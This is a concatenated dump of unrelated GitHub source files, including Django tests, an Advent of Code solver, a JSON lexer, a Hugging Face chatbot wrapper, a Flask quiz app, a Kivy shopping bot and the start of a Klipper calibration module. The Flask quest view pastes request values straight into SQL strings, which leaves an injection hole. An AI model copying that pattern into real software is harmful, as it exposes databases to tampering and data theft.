f\"/posts/{PostURLTests.post.id}/\": HTTPStatus.OK,\n f\"/posts/{PostURLTests.post.id}/edit/\": HTTPStatus.FOUND,\n f\"/posts/{PostURLTests.post.id}/comment/\": HTTPStatus.FOUND,\n f\"/profile/{PostURLTests.author}/follow/\": HTTPStatus.FOUND,\n f\"/profile/{PostURLTests.author}/unfollow/\": HTTPStatus.FOUND,\n \"/follow/\": HTTPStatus.OK,\n \"/create/\": HTTPStatus.OK,\n \"/unexisting_page/\": HTTPStatus.NOT_FOUND,\n }\n for url, code in url_code.items():\n with self.subTest(url=url):\n response = self.authorized_client.get(url)\n self.assertEqual(response.status_code, code)\n\n def test_author_client_urls_status_code(self):\n \"\"\"Проверка status_code для автора поста\"\"\"\n url_code = {\n \"/\": HTTPStatus.OK,\n f\"/group/{PostURLTests.post.group.slug}/\": HTTPStatus.OK,\n f\"/profile/{PostURLTests.user}/\": HTTPStatus.OK,\n f\"/posts/{PostURLTests.post.id}/\": HTTPStatus.OK,\n f\"/posts/{PostURLTests.post.id}/edit/\": HTTPStatus.OK,\n f\"/posts/{PostURLTests.post.id}/comment/\": HTTPStatus.FOUND,\n 
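# (editor's note) follow/unfollow are redirect views, so 302 FOUND rather than 200 OK is the expected status here\n            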
f\"/profile/{PostURLTests.author}/follow/\": HTTPStatus.FOUND,\n f\"/profile/{PostURLTests.author}/unfollow/\": HTTPStatus.NOT_FOUND,\n \"/follow/\": HTTPStatus.OK,\n \"/create/\": HTTPStatus.OK,\n \"/unexisting_page/\": HTTPStatus.NOT_FOUND,\n }\n for url, code in url_code.items():\n with self.subTest(url=url):\n response = self.author_client.get(url)\n self.assertEqual(response.status_code, code)\n\n def test_urls_uses_correct_template(self):\n \"\"\"Проверка на соответствие URL-адресса и шаблона\"\"\"\n url_template = {\n \"/\": \"posts/index.html\",\n f\"/group/{PostURLTests.post.group.slug}/\": \"posts/group_list.html\",\n f\"/profile/{PostURLTests.user}/\": \"posts/profile.html\",\n f\"/posts/{PostURLTests.post.id}/\": \"posts/post_detail.html\",\n f\"/posts/{PostURLTests.post.id}/edit/\": \"posts/create_post.html\",\n \"/follow/\": \"posts/follow.html\",\n \"/create/\": \"posts/create_post.html\",\n }\n for url, template in url_template.items():\n with self.subTest(url=url):\n response = self.author_client.get(url)\n self.assertTemplateUsed(response, template)\n","repo_name":"frajik/hw05_final","sub_path":"yatube/posts/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23375395513","text":"import re\nfrom typing import List, Tuple\n\n\nRegisters = List[int]\n\n\ndef addr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] + registers[b]\n return new_registers\n\n\ndef addi(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] + b\n return new_registers\n\n\ndef mulr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] * registers[b]\n return new_registers\n\n\ndef muli(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] * b\n return new_registers\n\n\ndef banr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] & registers[b]\n return new_registers\n\n\ndef bani(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] & b\n return new_registers\n\n\ndef borr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] | registers[b]\n return new_registers\n\n\ndef bori(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] | b\n return new_registers\n\n\ndef setr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a]\n return new_registers\n\n\ndef seti(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = a\n return new_registers\n\n\ndef gtir(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = 1 if a > registers[b] else 0\n return new_registers\n\n\ndef gtri(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = 1 if registers[a] > b else 0\n return new_registers\n\n\ndef gtrr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = 1 if registers[a] > registers[b] else 0\n return new_registers\n\n\ndef eqir(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = 1 if a == registers[b] else 0\n return new_registers\n\n\ndef eqri(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = 1 if 
registers[a] == b else 0\n return new_registers\n\n\ndef eqrr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = 1 if registers[a] == registers[b] else 0\n return new_registers\n\n\noperations = [addr, addi, mulr, muli, banr, bani, borr, bori, setr, seti, gtir, gtri, gtrr, eqir, eqri, eqrr]\n\n\ndef get_cpu_operations(input_text: str) -> Tuple[List[List[int]], List[List[int]]]:\n cpu_operations = []\n before_operation = None\n operation = None\n after_operation = None\n\n part_2_operations = []\n for line in input_text.splitlines():\n if line.startswith('Before: '):\n m = re.search(r'Before: .*\\[(.*), (.*), (.*), (.*)\\]', line)\n before_operation = [int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))]\n elif line.startswith('After: '):\n m = re.search(r'After: .*\\[(.*), (.*), (.*), (.*)\\]', line)\n after_operation = [int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))]\n cpu_operations.append((before_operation, operation, after_operation))\n before_operation = None\n elif line:\n operation = list(map(int, line.split()))\n if not before_operation:\n part_2_operations.append(operation)\n\n return cpu_operations, part_2_operations\n\n\ndef get_operator_map(cpu_operations):\n operator_map = {}\n\n for x in range(16):\n operator_map[x] = operations[:]\n\n for before, instruction, after in cpu_operations:\n passed = 0\n instruction_index = instruction[0]\n for operation in operator_map[instruction_index][:]:\n if operation(before, *instruction[1:]) != after:\n operator_map[instruction_index].remove(operation)\n\n removed_operator = set()\n removed_operator_in_loop = True\n\n while removed_operator_in_loop:\n removed_operator_in_loop = False\n for x in range(16):\n ops = operator_map[x]\n if len(ops) == 1 and x not in removed_operator:\n removed_operator.add(x)\n removed_operator_in_loop = True\n for y in range(16):\n if y == x:\n continue\n if ops[0] in operator_map[y]:\n operator_map[y].remove(ops[0])\n continue\n\n return {k: v[0] for k, v in operator_map.items()}\n\n\ndef get_answer(input_text: str) -> int:\n cpu_operations, part_2_operations = get_cpu_operations(input_text)\n operator_map = get_operator_map(cpu_operations)\n total_passed_multi = 0\n registers = [0, 0, 0, 0]\n for cpu_operation in part_2_operations:\n instruction = cpu_operation[0]\n registers = operator_map[instruction](registers, *cpu_operation[1:])\n\n return registers[0]\n\n\ndef main():\n with open('input.txt') as input_file:\n input_text = input_file.read().rstrip('\\n')\n print(get_answer(input_text))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"rob256/adventofcode2018","sub_path":"python3/day_16/day_16_part_2.py","file_name":"day_16_part_2.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16467749972","text":"import Constants as const\n''' This program will read a number from a stream and\n after capturing the number return the rest of it'''\ndef lex_numbers(stream):\n json_number = ''\n\n number_characters = [str(d) for d in range(0,10)] + ['-','e','.']\n\n for c in stream:\n if c in number_characters:\n json_number += c\n else:\n break\n rest = stream[len(json_number):]\n\n if not len(json_number):\n return None,stream\n if '.' 
in json_number:\n return float(json_number),rest\n \n return int(json_number),rest\n\n'''This program will look for a string in the stream else\n returns the whole stream back'''\ndef lex_string(stream):\n json_string = ''\n if stream[0] == const.DOUBLE_QUOTE:\n ''' if the first character is a quote then definitely a string follows\n and we will discard the quote and move ahead with capturing th string\n by running through a loop until we get one unquote/quote '''\n stream = stream[1:]\n else:\n # else we return empty character and the stream back to the calling method\n return json_string,stream\n\n # we will loop through to cature all strings until we find unquote/quote\n for c in stream:\n if c == const.DOUBLE_UNQUOTE:\n return json_string,stream[len(json_string)+1:]\n else:\n json_string += c\n\n'''This program is a lexer which will take json stream and\n tokenize all the elements and create a liner list'''\n\ndef lex(stream):\n tokens = []\n\n while len(stream):\n json_string,stream = lex_string(stream)\n if json_string is not '':\n tokens.append(json_string)\n continue\n\n json_number,stream = lex_numbers(stream)\n if json_number is not None:\n tokens.append(json_number)\n continue\n\n if stream[0] in const.JSON_WHITESPACE:\n stream = stream[1:]\n\n elif stream[0] in const.JSON_SYNTAX:\n tokens.append(stream[0])\n stream = stream[1:]\n else:\n raise Exception('Unexpected character: {}'.format(stream[0]))\n return tokens\n\nprint(lex(\"{\\\"name\\\":\\\"Khitish\\\",\\\"age\\\":25,\\\"phone\\\":\\\"+919234567891\\\"}\"))","repo_name":"kkrath/jsonparser","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"13565697365","text":"\"\"\"\r\n\r\n\r\nBe sure to run these pip installation:\r\n pip install transformers\r\n pip install torch 2.0.1+cpu # Needed to support ChatBot.let_model()\r\n Alaternatively, to use a GPU:\r\n pip install torch==1.9.0+cu111 -f https://download.pytorch.org/whl/torch_stable.html\r\n\r\n\r\n\"\"\"\r\nimport os\r\nimport subprocess\r\nimport sys\r\nfrom pathlib import Path\r\nimport warnings\r\n\r\n\r\nimport transformers # \"pip install transformers\"\r\nimport torch \r\n\r\n\r\ndefault_model_name: str = 'google/flan-t5-xl'\r\n# default_model_name: str = 'google/flan-t5-base'\r\n\r\n\r\nclass ChatBot:\r\n def __init__(self, update_transformers_lib: bool = False,\r\n set_environ_variables: bool = False,\r\n model_name: str = default_model_name,\r\n max_new_tokens: int = 4096,\r\n force_cpu: bool = False,\r\n ):\r\n self.import_transformers_lib()\r\n if update_transformers_lib:\r\n self.update_transformers_lib()\r\n if set_environ_variables:\r\n self.set_environment_variables_for_offline_training()\r\n self._model_name = model_name\r\n self.max_new_tokens = max_new_tokens\r\n self._tokenizer = None\r\n self.let_tokenizer(overwrite_tokenizer=True)\r\n self._model = None\r\n self._force_cpu = force_cpu\r\n self._device = None\r\n self.let_model(model=self._model, overwrite_model=True)\r\n\r\n def import_transformers_lib(self, lib_name: str = 'transformers'):\r\n \"\"\"\r\n Pip install the transformers library from HUGGINGFACE. This library allows you to install transformers.\r\n For help, see https://huggingface.co/docs/transformers/installation#install-with-pip\r\n\r\n :param lib_name: The name of the library to install. 
Options include:\r\n transformers, tokenizers, and datasets.\r\n transformers: 'transformers', 'transformers[torch]', 'transformers[tf-cpu]', 'transformers[flax]'\r\n :return: True if the update was successful, False otherwise.\r\n \"\"\"\r\n try:\r\n import transformers\r\n except ModuleNotFoundError:\r\n subprocess.check_call(f\"pip install {lib_name}\")\r\n import transformers\r\n return True\r\n\r\n def update_transformers_lib(self, transformers_subfolder: str = 'transformers'):\r\n \"\"\"\r\n Update transformers via git pull\r\n For help, see https://huggingface.co/docs/transformers/installation#install-with-pip\r\n\r\n :param transformers_subfolder: The name of the library to install. Options include:\r\n transformers, tokenizers, and datasets.\r\n transformers: 'transformers', 'transformers[torch]', 'transformers[tf-cpu]', 'transformers[flax]'\r\n \"\"\"\r\n # change directories to the path to the folder for this python file using pathlib.Path\r\n __folder__ = Path(os.path.dirname(os.path.abspath(__file__))).absolute()\r\n os.chdir(__folder__)\r\n # change to transformers_folder subdirectory of here.\r\n transformers_subfolder = os.path.join(__folder__, transformers_subfolder)\r\n os.chdir(transformers_subfolder)\r\n # check if the folder exists\r\n assert os.path.exists(transformers_subfolder), \\\r\n f'git pull failed. Folder {transformers_subfolder} does not exist.'\r\n # perform a git pull\r\n subprocess.check_call(['git', 'pull'])\r\n\r\n def set_environment_variables_for_offline_training(self, transformers_offline: int = 1,\r\n datasets_offline: int = 1):\r\n # For help: https://huggingface.co/docs/transformers/installation#offline-mode\r\n\r\n # Transformers is able to run in a firewalled or offline environment by only using local files. Set the environment variable TRANSFORMERS_OFFLINE=1 to enable this behavior.\r\n os.environ['TRANSFORMERS_OFFLINE'] = str(transformers_offline)\r\n # Add 🤗 Datasets to your offline training workflow by setting the environment variable HF_DATASETS_OFFLINE=1.\r\n os.environ['HF_DATASETS_OFFLINE'] = str(datasets_offline)\r\n\r\n # python examples/pytorch/translation/run_translation.py --model_name_or_path t5-small --dataset_name wmt16 --dataset_config ro-en ...\r\n # Run trasnslation.py\r\n\r\n @property\r\n def device(self):\r\n if self._device:\r\n return self._device\r\n elif self._force_cpu:\r\n self._device = 'cpu'\r\n else:\r\n self._device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n return self._device\r\n\r\n def let_tokenizer(self, overwrite_tokenizer: bool = False):\r\n \"\"\"\r\n Retrieves an AutoTokenizer from the transformers library for the specified model.\r\n\r\n :param overwrite_tokenizer: Optional, if tokenizer was already set, overwrite it?\r\n :type overwrite_tokenizer: bool\r\n :return: The AutoTokenizer instance.\r\n :rtype: transformers.AutoTokenizer\r\n \"\"\"\r\n # From: https://www.youtube.com/watch?v=tL1zltXuHO8\r\n if not hasattr(self, 'tokenizer'):\r\n self._tokenizer = None\r\n elif self._tokenizer and not overwrite_tokenizer:\r\n # self._tokenizer already exists. 
Do not overwrite.\r\n return\r\n\r\n self.import_transformers_lib()\r\n\r\n self._tokenizer = transformers.AutoTokenizer.from_pretrained(self._model_name)\r\n\r\n return self._tokenizer\r\n\r\n def tokenize_prompt(self, prompt: str = 'What color is the sky?') -> list:\r\n \"\"\"\r\n Takes a prompt (str) and tokenizes it.\r\n :param prompt: A prompt/question to send to the model (i.e., the chatbot).\r\n :type prompt: str\r\n :return: The tokenized prompt (list of strings).\r\n :rtype: list\r\n \"\"\"\r\n # From: https://www.youtube.com/watch?v=tL1zltXuHO8\r\n self.let_tokenizer(overwrite_tokenizer=False)\r\n # tokens = self._tokenizer.tokenize(prompt).to(self.device)\r\n # token_ids = self._tokenizer.convert_tokens_to_ids(tokens)\r\n # return token_ids\r\n tensor = self._tokenizer(prompt, return_tensors='pt', add_special_tokens=True).to(self.device)\r\n return tensor\r\n\r\n def let_model(self, model=None, overwrite_model: bool = False):\r\n \"\"\"\r\n Takes a model (str) and tokenizes it.\r\n :param model: The name or path of the pre-trained model to use. Defaults to 'google/flan-t5-base'.\r\n :type model: str\r\n :return: The AutoModel instance.\r\n :rtype: transformers.AutoModel\"\"\"\r\n if not hasattr(self, '_model') or overwrite_model:\r\n self._model = transformers.AutoModelForSeq2SeqLM.from_pretrained(self._model_name)\r\n self._gen_config = transformers.GenerationConfig(max_new_tokens=self.max_new_tokens)\r\n self._model.to(self.device)\r\n return self._model\r\n\r\n @property\r\n def model(self):\r\n return self._model\r\n \r\n @property\r\n def model_name(self):\r\n return self._model_name\r\n\r\n def embed(self, tokens):\r\n # Add the tokenized prompt to the embeddings.\r\n if not hasattr(self, 'input_embeddings') or not self.input_embeddings:\r\n self._input_embeddings = self._model.get_input_embeddings()\r\n if tokens:\r\n if isinstance(tokens, str):\r\n tokens = self.tokenize_prompt(prompt=tokens)\r\n self.our_embeddings = self._input_embeddings(tokens['input_ids'][0])\r\n else:\r\n self.our_embeddings = self._input_embeddings\r\n\r\n def process_prompt(self, prompt: str):\r\n # In case tokenizer is not yet created:\r\n self.let_tokenizer(overwrite_tokenizer=False)\r\n # Tokenize the prompt.\r\n tokens = self.tokenize_prompt(prompt=prompt)\r\n\r\n # In case model is not yet created:\r\n self.let_model(model=self._model, overwrite_model=False)\r\n\r\n # Create output tokens tensor\r\n output_tokens = self._model.generate(**tokens, generation_config=self._gen_config)\r\n\r\n # Convert the output tokens tensor to a list of str.\r\n outputs = self._tokenizer.batch_decode(output_tokens, skip_special_tokens=True)\r\n\r\n return '\\n'.join(outputs)\r\n\r\n\r\ndef main() -> bool:\r\n \"\"\"\r\n\r\n :param install: install the transformers library\r\n :type install: bool\r\n :param update: update the transformers library\r\n :type update: bool\r\n :return: A dict of the results\r\n :rtype: dict\r\n \"\"\"\r\n chatbot = ChatBot(model_name='google/flan-t5-base')\r\n # prompt = 'What color is the sky?'\r\n # # tokenize_prompt returns a tensor of token IDs.\r\n # tokens = chatbot.tokenize_prompt(prompt=prompt)\r\n # print(prompt, tokens)\r\n # chatbot.let_model()\r\n # for line in sys.stdin:\r\n\r\n # This does not yet work. The embed method is probably the wrong approach. 
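(Editor's note: get_input_embeddings() only maps token ids to embedding vectors; it cannot store new knowledge in the model. Prepending the text to each prompt, or fine-tuning, are the usual alternatives.)\r\n    # 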
Need to investigate further.\r\n chatbot.embed('PJM is a company in Pennsylvania that manages the electric power grid for 13 states and D.C.')\r\n\r\n prompt = input('Enter prompt: ')\r\n while prompt.lower() not in ['e', 'exit', 'q', 'quit']:\r\n response = chatbot.process_prompt(prompt)\r\n print(response)\r\n prompt = input('Enter prompt: ')\r\n\r\n\r\nif __name__ == '__main__':\r\n result = main()\r\n\r\n","repo_name":"cadvena/GenerativeChatbot","sub_path":"custom_gpt/hug_face.py","file_name":"hug_face.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"86363546035","text":"from kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.dropdown import DropDown\nfrom kivy.uix.image import AsyncImage\nfrom kivy.uix.label import Label\nfrom buy_logic.order import Order\n\nclass DisplayItem(BoxLayout):\n def __init__(self, item, driver, **kwargs):\n super(DisplayItem, self).__init__(**kwargs)\n self.item = item\n self.img = AsyncImage(source=self.item.img_src, size_hint=(1,1))\n self.img.width = 200\n self.img.height = 200\n self.name = self.item.name\n self.link = self.item.link\n self.status = self.item.status\n\n self.driver=driver\n\n self.add_widget(self.img)\n self.buy_btn = Button(text=\"Buy\", size_hint=(1,0.1))\n self.buy_btn.bind(on_press=self.buy_item)\n self.info_layout = GridLayout()\n self.info_layout.cols = 1\n self.info_layout.rows = 4\n\n #Case item has no options\n if self.item.sizes is not None:\n self.sizes = DropDown()\n for size in self.item.sizes:\n btn = Button(text=size, size_hint_y=None)\n btn.bind(on_release=lambda btn: self.sizes.select(btn.text))\n self.sizes.add_widget(btn)\n\n #set default value to item.sizes\n self.mainbutton = Button(text=self.item.sizes[0], size_hint=(1, 0.1))\n self.mainbutton.bind(on_release=self.sizes.open)\n self.sizes.bind(on_select=lambda instance, x: setattr(self.mainbutton, \"text\", x))\n self.info_layout.add_widget(self.mainbutton)\n\n self.info_label = Label(text=str(self.status), size_hint=(1,0.1), markup=True)\n self.info_layout.add_widget(self.info_label)\n if self.status is None:\n self.info_label.text = \"[color=00ff00]In Stock[/color]\"\n self.info_layout.add_widget(self.buy_btn)\n else:\n self.info_label.text = \"[color=ff0000][b][size=15]OUT OF STOCK[/size][/b][/color]\"\n\n self.add_widget(self.info_layout)\n\n def buy_item(self, instance, size=\"Medium\"):#\n tee_size = App.get_running_app().get_size()\n shorts_size = App.get_running_app().get_shorts_size()\n import threading\n thread = threading.Thread(target=Order.buy, args=(self, [tee_size, shorts_size], self.driver))\n thread.daemon = True\n thread.start()\n\n def set_driver(self, driver):\n self.driver = driver\n\n def set_status_sold_out(self, boolean):\n if boolean:\n self.info_label.text = \"[color=ff0000][b][size=15]OUT OF STOCK[/size][/b][/color]\"\n else:\n self.info_label.text = \"[color=00ff00]In Stock[/color]\"","repo_name":"Juphex/SupremeBot","sub_path":"app/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"23555856849","text":"from jinja2 import Environment, FileSystemLoader\nfrom email.mime.text import MIMEText\n\nclass Builder:\n\n def __init__(self):\n return\n\n def build_template(self, symbols, summary, articles, 
company_name, exchange):\n\n try:\n\n # Declare jinja2 template\n\n file_loader = FileSystemLoader('templates')\n env = Environment(loader = file_loader)\n template = env.get_template('email.html')\n\n # Build jinja2 template from /templates/email.html\n\n output = template.render (symbols = symbols, summary = summary, articles = articles, companyName = company_name, exchange = exchange)\n\n body = MIMEText(output, 'html')\n\n return body\n\n except Exception as e:\n\n # Print thrown error\n\n print(\"Error in the Builder class: \" + str(e))\n\n","repo_name":"tlemenestrel/Automated_Stock_Updates","sub_path":"template_builder.py","file_name":"template_builder.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"32684885730","text":"\"\"\"added water level to sensor readings\n\nRevision ID: 951de0bf9891\nRevises: 9b4c6ff76b5e\nCreate Date: 2019-05-19 17:46:36.215469\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '951de0bf9891'\ndown_revision = '9b4c6ff76b5e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('dht_sensor_readings', sa.Column('water_level', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('dht_sensor_readings', 'water_level')\n # ### end Alembic commands ###\n","repo_name":"tohir87/sdp","sub_path":"migrations/versions/951de0bf9891_added_water_level_to_sensor_readings.py","file_name":"951de0bf9891_added_water_level_to_sensor_readings.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9340874733","text":"from flask import Blueprint, render_template, redirect, url_for, request, session, g\nfrom ..db import WebProject, exp_manager\nfrom markupsafe import Markup\nimport json\n\nbp = Blueprint('quest', __name__, url_prefix='/quest')\nwp = WebProject.instance()\nem = exp_manager.instance()\n\n@bp.route('/')\ndef quest_list():\n category_data = {}\n category_data[\"list\"] = wp.send_query(\"SELECT category, COUNT(category) AS n FROM problem GROUP BY category ORDER BY category\")\n category_data[\"total\"] = wp.send_query(\"SELECT COUNT(*) AS count FROM problem\")[0][\"count\"]\n\n problem_list = wp.send_query(\"\"\"\n SELECT problem.id, problem.category, (CASE solved WHEN 1 THEN 'solved' WHEN 0 THEN 'solving' ELSE 'unsolved' END) as status \n FROM problem LEFT JOIN solving ON problem.id = solving.problem_id AND user_id='{}' \n ORDER BY problem.id\n \"\"\".format(g.user[\"user_id\"]))\n return render_template('main/quest_list.html', category_data = category_data, problem_list = problem_list)\n\n@bp.route('/', methods=['GET', 'POST'])\ndef problem_show(problem_id):\n if(request.method == \"POST\"):\n send = {}\n if(em.can_exp(g.user[\"user_id\"], \"quest_solve\")):\n send[\"can_exp\"] = True\n params = request.get_json()\n\n result = wp.send_query(\"SELECT CASE WHEN answer = '{}' THEN TRUE ELSE FALSE END AS success FROM {} WHERE id = {}\".format(params[\"answer\"], params[\"type\"], params[\"problem_id\"]))\n\n is_exist = wp.send_query(\"SELECT EXISTS (SELECT * FROM solving WHERE user_id = '{}' AND problem_id = {}) as success\".format(g.user[\"user_id\"], params[\"problem_id\"]))\n\n if(is_exist[0][\"success\"]):\n 
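# (editor's note) interpolating request values into SQL via str.format, as below, is injection-prone; a parameterized form would be safer, e.g. (illustrative sketch, assumes a DB-API style cursor):\n            #     cursor.execute(\"UPDATE solving SET solved = %s WHERE user_id = %s AND problem_id = %s\",\n            #                    (result[0][\"success\"], g.user[\"user_id\"], params[\"problem_id\"]))\n            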
wp.send_query(\"UPDATE solving SET solved = {} WHERE user_id = '{}' AND problem_id = {}\".format(result[0][\"success\"], g.user[\"user_id\"], params[\"problem_id\"]), commit=True)\n else:\n wp.send_query(\"INSERT INTO solving(solved, user_id, problem_id) VALUES ('{}', '{}', {})\".format(result[0][\"success\"], g.user[\"user_id\"], params[\"problem_id\"]), commit=True)\n \n send[\"success\"] = result[0][\"success\"]\n if(send[\"success\"]):\n send[\"exp\"] = em.exp_dict[\"quest_solve\"]\n em.gain_exp(g.user[\"user_id\"], \"quest_solve\")\n else:\n send[\"exp\"] = 0\n\n else:\n send[\"can_exp\"] = False\n send[\"success\"] = 0\n send[\"exp\"] = 0\n \n return json.dumps(send)\n\n \n problem_data = {}\n\n problem_data[\"status\"] = wp.send_query(\"\"\"\n SELECT (CASE solved WHEN 1 THEN 'solved' WHEN 0 THEN 'solving' ELSE 'unsolved' END) as status \n FROM problem LEFT JOIN solving ON problem.id = solving.problem_id AND user_id = '{}' WHERE id = '{}'\n \"\"\".format(g.user[\"user_id\"], problem_id))[0][\"status\"]\n\n problem_type = wp.send_query(\"SELECT type FROM problem WHERE id = {0}\".format(problem_id))[0][\"type\"]\n if(problem_type==\"객관식\"):\n sql = \"SELECT problem.*, objective.choices, objective.answer FROM problem INNER JOIN objective ON problem.id = objective.id WHERE problem.id = {}\".format(problem_id)\n else:\n sql = \"SELECT problem.*, subjective.answer FROM problem INNER JOIN subjective ON problem.id = subjective.id WHERE problem.id = {}\".format(problem_id)\n \n problem_data[\"problem\"] = wp.send_query(sql)[0]\n\n print(problem_data[\"problem\"])\n\n for key, val in problem_data[\"problem\"].items():\n if(type(val)==str):\n val = val.replace(\"\\'\\'\", \"\\'\")\n val = val.replace(\"\\\"\\\"\", \"\\\"\")\n problem_data[\"problem\"][key] = val\n \n # problem_data[\"problem\"][\"content\"] = problem_data[\"problem\"][\"content\"].replace(\"\\n\", \"
\")\n # problem_data[\"problem\"][\"explanation\"] = problem_data[\"problem\"][\"explanation\"].replace(\"\\n\", \"
\")\n\n print(problem_data[\"problem\"])\n\n return render_template(\"main/quest_show.html\", problem_data=problem_data)","repo_name":"0BackFlash0/Web-Project","sub_path":"WebPage/project/web/views/quest_views.py","file_name":"quest_views.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11352653103","text":"#HollowInvertedFullPyramid_2\n\nrows_n = int(input())\n\nfor i in range(1,rows_n+1):\n \n left_spaces = \" \"*(i-1)\n if i == 1:\n first_row =\"\"\n for f in range(1,rows_n+1):\n first_row =first_row+str(f)+\" \"\n print(left_spaces+first_row)\n elif i == rows_n:\n last_row = rows_n+1-i\n print(left_spaces+str(last_row))\n else:\n hollow_spaces = \" \"*(rows_n-i-1)\n start_range =1 \n end_range = rows_n+2-i\n for m in range(start_range,end_range):\n f_char = str(start_range)+\" \"\n l_char = str(m)\n middle_lines = left_spaces+f_char+hollow_spaces+l_char\n print(middle_lines)","repo_name":"veeru78866/ccbpCodes","sub_path":"ccbp_codes/codingPractice_14/HollowInvertedFullPyramid_2.py","file_name":"HollowInvertedFullPyramid_2.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"21596046590","text":"#!/usr/bin/python\n\nimport csv\nimport pylab\n\nfrom toolbox import stats\n\n\ndef ReadAndAvgDoublingTimes(filename):\n d = {}\n f = open(filename)\n for row in csv.reader(f):\n key = row[0]\n doubling_time = float(row[-1])\n d.setdefault(key, []).append(doubling_time)\n \n out = {}\n for key, dts in d.iteritems():\n out[key] = stats.MeanWithConfidenceInterval(dts)\n \n return out\n\n\ndts1 = ReadAndAvgDoublingTimes('/home/flamholz/Desktop/DoublingEst_WT.txt')\ndts2 = ReadAndAvgDoublingTimes('/home/flamholz/Desktop/DoublingEst_Adapted.txt')\n\n\nkeys = sorted(dts1.keys())\nvals1 = [dts1[k][0] for k in keys]\nvals2 = [dts2[k][0] for k in keys]\nerrs1 = [dts1[k][1] for k in keys]\nerrs2 = [dts2[k][1] for k in keys]\n\npylab.figure()\npylab.xlabel('WT Doubling Time')\npylab.ylabel('Adapted Doubling Time')\npylab.errorbar(vals1, vals2, yerr=errs2, xerr=errs1, fmt='g.', ecolor='b')\n#pylab.errorbar(x, y, yerr, xerr, fmt, ecolor, elinewidth, capsize, barsabove, lolims, uplims, xlolims, xuplims, hold)\nfor i, k in enumerate(keys):\n pylab.text(vals1[i], vals2[i], k)\n\npylab.show()\n\n \n\n","repo_name":"eladnoor/milo-lab","sub_path":"src/scripts/compare_robosite_doubling_times.py","file_name":"compare_robosite_doubling_times.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"4440149342","text":"import logging\nimport math\nfrom . 
import manual_probe as ManualProbe, bed_mesh as BedMesh\n\nDEFAULT_N_POINTS = 3\nDEFAULT_PROFILE_NAME = 'default'\nBED_MESH_CONFIG_NAME = 'bed_mesh'\n\n\nclass Config:\n # values stored in printer.cfg when a profile is saved\n DEFAULT_SPEED = 50.\n DEFAULT_HORIZONTAL_MOVE_Z = 10.\n REQUIRED = True\n OPTIONAL = False\n CONFIG_OPTIONS = {\n 'horizontal_move_z': (float, OPTIONAL, DEFAULT_HORIZONTAL_MOVE_Z),\n 'speed': (float, OPTIONAL, DEFAULT_SPEED),\n 'start_x': (float, REQUIRED, None),\n 'end_x': (float, REQUIRED, None),\n 'y': (float, REQUIRED, None)\n }\n\n\nclass XTwistCompensation:\n def __init__(self, config):\n # get printer\n self.printer = config.get_printer()\n\n # get values from [x_twist_compensation] section in printer .cfg\n for config_key, \\\n (config_type, required, default) in Config.CONFIG_OPTIONS.items():\n value = None\n if config_type == float:\n value = config.getfloat(config_key, default)\n else:\n value = config.get(config_key, default)\n if required and value is None:\n raise config.error(\n \"Missing required config option for section [{}]: {}\"\n .format(config.get_name(), config_key))\n setattr(self, config_key, value)\n\n # setup persistent storage\n self.pmgr = ProfileManager(config, self)\n\n # setup calibrater\n calibrater_config = {\n 'horizontal_move_z': self.horizontal_move_z\n if hasattr(self, 